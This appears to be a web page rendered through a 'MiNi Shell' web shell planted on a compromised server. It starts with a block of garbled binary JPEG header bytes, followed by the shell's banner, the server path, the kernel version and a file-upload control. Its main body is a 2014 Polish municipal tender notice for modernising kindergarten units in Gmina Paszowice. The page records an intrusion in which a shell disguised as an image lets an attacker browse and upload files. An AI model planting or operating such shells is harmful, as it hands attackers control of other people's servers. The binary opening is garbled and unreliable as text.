JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/94215-N-2014.html

<p class="kh_header"><b>Paszowice: Modernizacja oddziałów przedszkolnych w Gminie Paszowice</b><br>
<b>Numer ogłoszenia: 94215 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Paszowice , Paszowice 137, 59-411 Paszowice, woj. dolnośląskie, tel. 076 8701793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.paszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w Gminie Paszowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w ramach projektu Modernizacja oddziałów przedszkolnych w
Gminie Paszowice jest:
1) Organizacja placu zabaw dla oddziałów przedszkolnych w Gminie Paszowice: wykonanie bezpiecznej nawierzchni, zakup i montaż wyposażenia placu zabaw.
Dostosowanie pomieszczeń: toalet.
Wyposażenie oddziałów przedszkolnych w Gminie Paszowice w meble, zabawki i pomoce
dydaktyczne, sprzęt audiowizualny, sprzęt komputerowy, sprzęt AGD, zakup i montaż rolet
okiennych.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 11 do specyfikacji istotnych
warunków zamówienia. W cenie oferty należy uwzględnić wszystkie koszty zakupu, dostawy i
montażu zamówionych urządzeń i wyposażenia oraz budowy placu zabaw w miejscu lokalizacji.
2) Wszystkie pomoce dydaktyczne i wyposażenie powinno być nowe, nie noszące śladów
uszkodzeń zewnętrznych i uprzedniego używania tzn., że żadna część składająca się na dany
materiał nie może być wcześniej używana, musi pochodzić z bieżącej produkcji, winny posiadać
niezbędne certyfikaty bezpieczeństwa, być sprawne i posiadać wyposażenie niezbędne do
funkcjonalnego działania.
3) Pomoce dydaktyczne, wyposażenie i materiały dostarczone w ramach zawartej umowy winny
spełniać wymagania norm UE. Produkty, które tego wymagają winny posiadać odpowiednio do
asortymentu niezbędne certyfikaty bezpieczeństwa, atesty, świadectwa jakości i spełniać wszelkie
wymogi norm określonych obowiązującym prawem.
a. Zamawiający wymaga, aby instrukcje do zamawianych towarów były w języku polskim.
b. Dostarczone pomoce dydaktyczne, wyposażenie musi być odpowiednio zapakowane, aby
zapobiec uszkodzeniu w czasie dostawy.
4) Wykonawca dostarczy zamawiany asortyment we własnym zakresie i na własny koszt do
wskazanej przez Zamawiającego placówki oświatowej, w dni robocze od poniedziałku do piątku w
godz. 8:00 do 15:00, po wcześniejszym uzgodnieniu terminu telefonicznie z dyrektorem szkoły.
a. Wykonawca odpowiada za dostarczony asortyment w czasie transportu w przypadku uszkodzeń
ponosi pełną odpowiedzialność za powstałe szkody. Wykonawca zobowiązuje się do usunięcia na
własny koszt wszelkich szkód spowodowanych przez Wykonawcę i powstałych w trakcie realizacji
zamówienia. Dostarczone wyposażenie i pomoce dydaktyczne zostaną komisyjnie przyjęte przez
Zamawiającego. Z odbioru sporządzany będzie protokół odbioru jakościowo-ilościowy, w którym
zostaną zapisane wszelkie uwagi dotyczące dostarczanych pomocy.
b. Wskazane w opisie przedmiotu zamówienia np. tytuły plansz, znaki towarowe, patenty są
uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie, jakości
przedmiotu zamówienia. W związku z powyższym Zamawiający dopuszcza możliwość
przedstawienia w ofercie Wykonawcy asortymentu równoważnego (innego niż podany z nazwy przez Zamawiającego w załączniku nr 11 do SIWZ pod warunkiem, iż oferowany asortyment będzie
o takich samych lub lepszych parametrach technicznych, jakościowych, funkcjonalnych oraz
użytkowych, co wskazany w dokumentacji konkretny z nazwy oraz będzie spełniać wszystkie
wymagania Zamawiającego. Wszystkie wymienione w załączniku nr 11 do SIWZ wymagania
techniczne należy traktować, jako minimalne. Obowiązek wykazania, iż oferowany przedmiot
zamówienia spełnia wymagania Zamawiającego, leży po stronie Wykonawcy. W przypadku
zaoferowania towaru równoważnego Wykonawca obowiązany jest do oferty koniecznie załączyć
szczegółową specyfikację oferowanego asortymentu celem potwierdzenia zgodności z niniejszą
specyfikacją. Wszelkie ryzyko (w tym koszty ewentualnych ekspertyz) związane z udowodnieniem
tzw. równoważności, pomocy dydaktycznych wskazanych w załączniku nr 11, spoczywa na
Wykonawcy. Wykonawca zobowiązany jest w takim przypadku wykazać, że dostarczane przez niego
artykuły spełniają wymagania określone przez Zamawiającego.
5) Wymagania dotyczące robót:
a. Wszystkie prace budowlane powinny być realizowane zgodnie z przepisami, obowiązującymi
normami, warunkami technicznymi i sztuką budowlaną, przepisami BHP, ppoż., zgodnie z
poleceniami ustalonymi przez Zamawiającego inspektora nadzoru.
b. Roboty należy prowadzić zgodnie z wymogami dokumentacji określającej przedmiot zamówienia
oraz wymogami niniejszej specyfikacji.
c. Wykonawca, po wykonaniu robót przygotuje dokumentację powykonawczą oraz kosztorys
różnicowy, jeżeli nastąpiły zmiany w stosunku do przedstawionego przedmiaru robot.
6) Wymagania dotyczące materiałów:
a. Użyte materiały i urządzenia powinny być w I gatunku jakościowym i wymiarowym, posiadać
odpowiednie dopuszczenie do stosowania w budownictwie.
b. Jeśli w przedmiarach, specyfikacjach technicznych, użyte zostały nazwy handlowe materiałów i
urządzeń, to należy je traktować jako propozycje. Wykonawca może zastosować materiały i
urządzenia równoważne o parametrach techniczno - użytkowych odpowiadających co najmniej
parametrom materiałów i urządzeń zaproponowanych w projektach.
c. Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty
potwierdzające pozwolenie na zastosowanie wbudowanie (atesty, certyfikaty, aprobaty
techniczne, świadectwa jakości).
W ustalaniu poziomu cen należy uwzględnić maksymalne wartości kategorii przypisane do
poszczególnych zadań określone w Załączniku nr 4 - Katalog wydatków kwalifikowalnych do
Zasad przygotowania, realizacji i rozliczania projektów systemowych w ramach Poddziałania
9.1.1 POKL w zakresie przygotowania oddziałów przedszkolnych w szkołach podstawowych do
świadczenia wysokiej jakości usług na rzecz dzieci w wieku przedszkolnym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 39.16.21.00-6, 30.23.60.00-2, 30.21.31.00-6, 32.32.20.00-6, 32.00.00.00-3, 37.53.52.00-9, 32.30.00.00-6, 45.11.27.23-9, 45.11.12.91-4, 45.22.38.00-4, 37.50.00.00-3, 37.52.00.00-9, 39.16.10.00-8, 39.22.00.00-0, 39.71.51.00-8, 45.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia
Wnioskodawcy zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych poprzez
stwierdzenie SPEŁNIA / NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawcy wykażą i udokumentują
(referencjami, opiniami, listami polecającym, protokołami odbioru lub innymi
dokumentami), że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a
jeżeli okres działalności jest krótszy - w tym okresie, wykonali zgodnie z zasadami i
prawidłowo ukończyli co najmniej 2 place zabaw na kwotę co najmniej 120 000 zł
netto oraz wykonali dostawę pomocy dydaktycznych i wyposażenia przedszkoli na
łączną kwotę co najmniej 100 000 zł netto. Ocena spełnienia tego warunku nastąpi
na podstawie wykazu wykonanych robót i załączonych dokumentów, poprzez
stwierdzenie SPEŁNIA / NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawcy dysponują odpowiednim
potencjałem technicznym do realizacji zamówienia. Ocena spełniania tego
warunku nastąpi na podstawie złożonego oświadczenia Wykonawcy zgodnie z art.
22 ust.1 Prawo zamówień publicznych poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawcy wykażą, że zapewnią
nadzór nad prowadzonymi robotami w postaci kierownika budowy oraz osób
posiadających uprawnienia do wykonywania samodzielnych funkcji technicznych
w budownictwie o specjalności odpowiadającej przedmiotowi zamówienia. Ocena
spełnienia tego warunku nastąpi na podstawie wykazu osób odpowiadających za
kierowanie robotami budowlanymi wraz z oświadczeniem, że osoby te posiadają
wymagane uprawnienia poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeśli Wykonawcy wykażą, że posiadają na
realizację przedmiotowego zamówienia środki finansowe lub zdolność kredytową w
wysokości 200 000,00 zł (słownie dwieście tysięcy złotych) oraz posiadają
ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności
związanej z przedmiotem zamówienia (od szkód na rzecz osób i mienia) o wartości
nie mniejszej niż 250 000,00 zł (słownie: dwieście pięćdziesiąt tysięcy złotych). Ocena
spełnienia tego warunku nastąpi na podstawie dostarczonych dokumentów tj.
informacji z banku lub spółdzielczej kasy oszczędnościowo kredytowej, w których
Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków
finansowych lub zdolność kredytową Wykonawcy wystawioną nie wcześniej niż 3
miesiące przed terminem składania ofert oraz opłaconą polisę lub inny dokument
potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w
zakresie prowadzonej działalności związanej z przedmiotem zamówienia (od szkód
na rzecz osób i mienia) poprzez stwierdzenie SPEŁNIA / NIESPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
1. Wypełniony i podpisany formularz oferty;
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie
publiczne z art. 22 ust. 1;
3. Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia
warunków o których mowa w art. 24 ust. 1 Prawa zamówień publicznych;
4. Oświadczenie dotyczące grupy kapitałowej z art. 26 ust 2d Prawa zamówień
publicznych;
5. Parafowany przez Wykonawcę wzór umowy;
6. Wykaz części zamówienia, które zostaną powierzone podwykonawcom wg
załącznika nr 9
do SIWZ.
7. Zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji
niezbędnych zasobów wg załącznika nr 8 do SIWZ (o ile dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.paszowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Paszowice, Paszowice 137, 59-411 Paszowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2014 godzina 12:00, miejsce: Urząd Gminy Paszowice, Paszowice 137, 59-411 Paszowice, Sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Modernizacja oddziałów przedszkolnych w Gminie Paszowice
Zadanie współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu
Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach.
Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług
edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.1 Zmniejszenie nierówności w
stopniu upowszechnienia edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com